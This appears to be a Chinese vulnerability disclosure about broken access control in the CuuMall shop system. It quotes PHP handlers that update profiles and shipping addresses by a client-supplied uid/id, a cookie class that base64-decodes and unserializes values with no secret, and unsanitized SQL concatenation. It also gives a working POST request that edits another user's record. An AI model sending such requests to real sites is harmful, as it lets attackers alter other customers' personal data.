### 简要描述:
CuuMall免费开源商城系统 越权集合
### 详细说明:
CuuMall免费开源商城系统 越权可修改对方的 收货地址 个人信息 等等
这里我们举一个例子,修改个人信息 直接看代码:
UserInfoAction.class.php:(716-735)
```
public function posteditpro( )
{
$uid = $_POST['uid'];
$data['shen'] = $_POST['shen'];
$data['shi'] = $_POST['shi'];
$data['qu'] = $_POST['qu'];
$data['sex'] = $_POST['sex'];
$data['realname'] = $_POST['realname'];
$data['email'] = $_POST['email'];
$data['more'] = $_POST['more'];
$data['youbian'] = $_POST['youbian'];
$data['tel'] = $_POST['tel'];
$data['mob'] = $_POST['mob'];
$data['qq'] = $_POST['qq'];
$data['ww'] = $_POST['ww'];
$rej = new Model( "m_per" );
$rej->data( $data )->where( "uid=".$uid )->save( );
$this->assign( "msgTitle", "编辑个人档案成功!" );
$this->success( "编辑个人档案成功!" );
}
```
我们看看权限判断是靠什么:
还是这个文件(28-35)
```
$co = new Cookie( );
$username = $co->get( c( "GUESTCOOK" )."mall-m-name" );
$password = $co->get( c( "GUESTCOOK" )."mall-m-pass" );
if ( empty( $username ) || empty( $password ) )
{
$this->redirect( "home/login" );
exit( );
}
```
这里只是用cookie里面的用户名和密码
这里的用户名和密码 都可完全转化为明文
看一下 cookie.class.php:
```
static function get($name) {
$value = $_COOKIE[C('COOKIE_PREFIX').$name];
$value = unserialize(base64_decode($value));
return $value;
}
```
这里没有任何秘钥 ,也就是说cookie里面的东西对于我们来说就是明文
那么我们回头再看 uid是post过来的 而且sql注入插入表:
$rej->data( $data )->where( "uid=".$uid )->save( );
这里明显只根据了uid做了判断
我们发送url
POST /cuumall_v2.3/v2.3/mall_upload/index.php/home/userinfo/posteditpro
postdata:
shen=%E6%B9%96%E5%8C%97&shi=%E8%8D%86%E5%B7%9E%E5%B8%82&qu=%E6%B2%99%E5%B8%82%E5%8C%BA&uid=5&realname=&email=test%401.com&more=xddd&youbian=xxx&tel=xxxxx&mob=xxxxxxx&qq=xxxxxxxxxxxxx&ww=xxxxxxxxxxxxxx&imageField.x=93&imageField.y=17&__hash__=f543cb0871b243508a543f0b18b91026
看看cookie里面的username,解出来是test 那么我们uid=5直接更改test2用户的信息资料
[<img src="https://images.seebug.org/upload/201409/301558312a34cafae3363950fb5b3c9fd40839a1.png" alt="18.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/301558312a34cafae3363950fb5b3c9fd40839a1.png)
这里被修改了
我们再看其他地方,还是这个文件:
```
public function postchgrejpro( )
{
$id = $_POST['id'];
$data['shen'] = $_POST['shen'];
$data['shi'] = $_POST['shi'];
$data['qu'] = $_POST['qu'];
$data['more'] = $_POST['more'];
$data['youbian'] = $_POST['youbian'];
$data['rejname'] = $_POST['rejname'];
$data['mob'] = $_POST['mob'];
$data['tel'] = $_POST['tel'];
$data['email'] = $_POST['email'];
$data['qq'] = $_POST['qq'];
$data['ww'] = $_POST['ww'];
$rej = new Model( "m_rejpro" );
$rej->data( $data )->where( "id=".$id )->save( );
$this->assign( "waitSecond", 3 );
$this->assign( "jumpUrl", "__APP__/home/userinfo/rejpru" );
$this->assign( "msgTitle", "收货地址编辑成功" );
$this->success( "收货地址编辑成功!" );
}
```
原理和刚才那个一样 这里不多赘述
其实应该还有好多地方,凡是用uid 做验证的 都具有越权操作
### 漏洞证明:
京公网安备 11010502034610号
暂无评论